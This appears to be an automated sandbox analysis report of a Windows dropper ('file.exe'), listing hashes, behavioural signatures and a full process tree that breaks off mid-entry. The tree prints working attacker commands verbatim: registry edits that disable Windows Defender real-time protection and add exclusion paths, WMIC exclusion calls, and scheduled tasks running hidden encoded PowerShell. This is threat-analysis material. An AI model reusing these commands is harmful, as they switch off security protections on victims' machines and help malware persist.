Analysis

  • max time kernel
    130s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    09/08/2024, 08:30

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    9f286c6dcc692c810599318da4fb93af

  • SHA1

    3392642bdcabb4037a7bcdf82d55860127b969e6

  • SHA256

    ce356a7fd469fa529476fe092054b405cba9cea4e953ccb01c4f5a47a549f000

  • SHA512

    a262901186ba0be27be8b1df799feb7bb6930d259a9dd2ca690ff995109ecf8df64222c6607dd30a2eb015efe3a224f5d77b639a766b51bb427fd0d4363d5c5e

  • SSDEEP

    196608:91OKbF32uC2HNAixod7UynBx3akmMn4HthCPusUrsdb++lr:3OK9eWbaVBmM4HthCVjd15

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1596
    • C:\Users\Admin\AppData\Local\Temp\7zSC487.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3040
      • C:\Users\Admin\AppData\Local\Temp\7zSC6B9.tmp\Install.exe
        .\Install.exe /oMpdidc "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2452
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2052
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:3024
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2208
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2872
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2660
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2728
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                7⤵
                  PID:2744
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              PID:2684
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                  PID:2656
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:2540
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                PID:1928
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2648
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:1576
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                5⤵
                • Indirect Command Execution
                PID:2568
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  6⤵
                    PID:2800
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      7⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2784
                      • C:\Windows\SysWOW64\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2724
              • C:\Windows\SysWOW64\forfiles.exe
                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                4⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                PID:2964
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2028
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1196
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1140
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "bwlAqOXgugWiNjfDVs" /SC once /ST 08:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ueMSDBwpqNPMtOCdL\MxoBXDgFsYXovYd\uDCiWCH.exe\" ST /Vhdidlds 525403 /S" /V1 /F
                4⤵
                • Drops file in Windows directory
                • Scheduled Task/Job: Scheduled Task
                PID:1380
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2452 -s 500
                4⤵
                • Loads dropped DLL
                • Program crash
                PID:2816
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {C3BE62FA-9004-40DC-9EF0-B48B13934C76} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
            PID:2600
            • C:\Users\Admin\AppData\Local\Temp\ueMSDBwpqNPMtOCdL\MxoBXDgFsYXovYd\uDCiWCH.exe
              C:\Users\Admin\AppData\Local\Temp\ueMSDBwpqNPMtOCdL\MxoBXDgFsYXovYd\uDCiWCH.exe ST /Vhdidlds 525403 /S
              2⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:1736
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2408
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                  4⤵
                  • Indirect Command Execution
                  PID:2976
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2948
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                      6⤵
                        PID:2824
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                    4⤵
                    • Indirect Command Execution
                    PID:2416
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:1560
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                        6⤵
                          PID:1076
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                      4⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:2148
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        5⤵
                          PID:1220
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                            6⤵
                            • System Location Discovery: System Language Discovery
                            PID:1660
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        PID:2900
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:2892
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                            6⤵
                              PID:576
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                          4⤵
                          • Indirect Command Execution
                          • System Location Discovery: System Language Discovery
                          PID:1472
                          • C:\Windows\SysWOW64\cmd.exe
                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                            5⤵
                              PID:452
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                6⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                • System Location Discovery: System Language Discovery
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1108
                                • C:\Windows\SysWOW64\gpupdate.exe
                                  "C:\Windows\system32\gpupdate.exe" /force
                                  7⤵
                                    PID:1952
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /CREATE /TN "goMTQbCIe" /SC once /ST 05:12:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                            3⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:1676
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /run /I /tn "goMTQbCIe"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1976
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /DELETE /F /TN "goMTQbCIe"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1636
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                            3⤵
                              PID:1864
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                4⤵
                                • Modifies Windows Defender Real-time Protection settings
                                • System Location Discovery: System Language Discovery
                                PID:2944
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2676
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                4⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:3024
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "gKnpTQfrS" /SC once /ST 02:05:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:2680
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /run /I /tn "gKnpTQfrS"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2688
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /DELETE /F /TN "gKnpTQfrS"
                              3⤵
                                PID:1140
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                3⤵
                                • Indirect Command Execution
                                • System Location Discovery: System Language Discovery
                                PID:1556
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                  4⤵
                                    PID:2020
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                      5⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2404
                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1996
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\CDACQYHYzIkxBFHu" /t REG_DWORD /d 0 /reg:32
                                  3⤵
                                    PID:2580
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\CDACQYHYzIkxBFHu" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • Windows security bypass
                                      PID:2732
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\CDACQYHYzIkxBFHu" /t REG_DWORD /d 0 /reg:64
                                    3⤵
                                      PID:2756
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\CDACQYHYzIkxBFHu" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:1908
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\CDACQYHYzIkxBFHu" /t REG_DWORD /d 0 /reg:32
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2080
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\CDACQYHYzIkxBFHu" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1632
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\CDACQYHYzIkxBFHu" /t REG_DWORD /d 0 /reg:64
                                      3⤵
                                        PID:1264
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\CDACQYHYzIkxBFHu" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1744
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C copy nul "C:\Windows\Temp\CDACQYHYzIkxBFHu\lijzWtfO\QmdplbooTphGDcIc.wsf"
                                        3⤵
                                          PID:1008
                                        • C:\Windows\SysWOW64\wscript.exe
                                          wscript "C:\Windows\Temp\CDACQYHYzIkxBFHu\lijzWtfO\QmdplbooTphGDcIc.wsf"
                                          3⤵
                                          • Modifies data under HKEY_USERS
                                          PID:1932
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HBhKqCBnU" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2852
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HBhKqCBnU" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2824
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JnYsKNtfKILCLnzmqvR" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            PID:1560
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JnYsKNtfKILCLnzmqvR" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:1016
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPRcqRDwMNfU2" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            PID:2892
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPRcqRDwMNfU2" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            PID:2428
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcKuTnVJrgUn" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:1148
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcKuTnVJrgUn" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            PID:2152
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tLkEVSRtDsYzC" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            PID:624
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tLkEVSRtDsYzC" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            PID:2508
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mRubDAwgBrMXtHVB" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            PID:1492
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mRubDAwgBrMXtHVB" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            PID:696
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            PID:3036
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            PID:2884
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ueMSDBwpqNPMtOCdL" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            PID:1720
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ueMSDBwpqNPMtOCdL" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2320
                                          • C:\Windows\SysWOW64\reg.exe
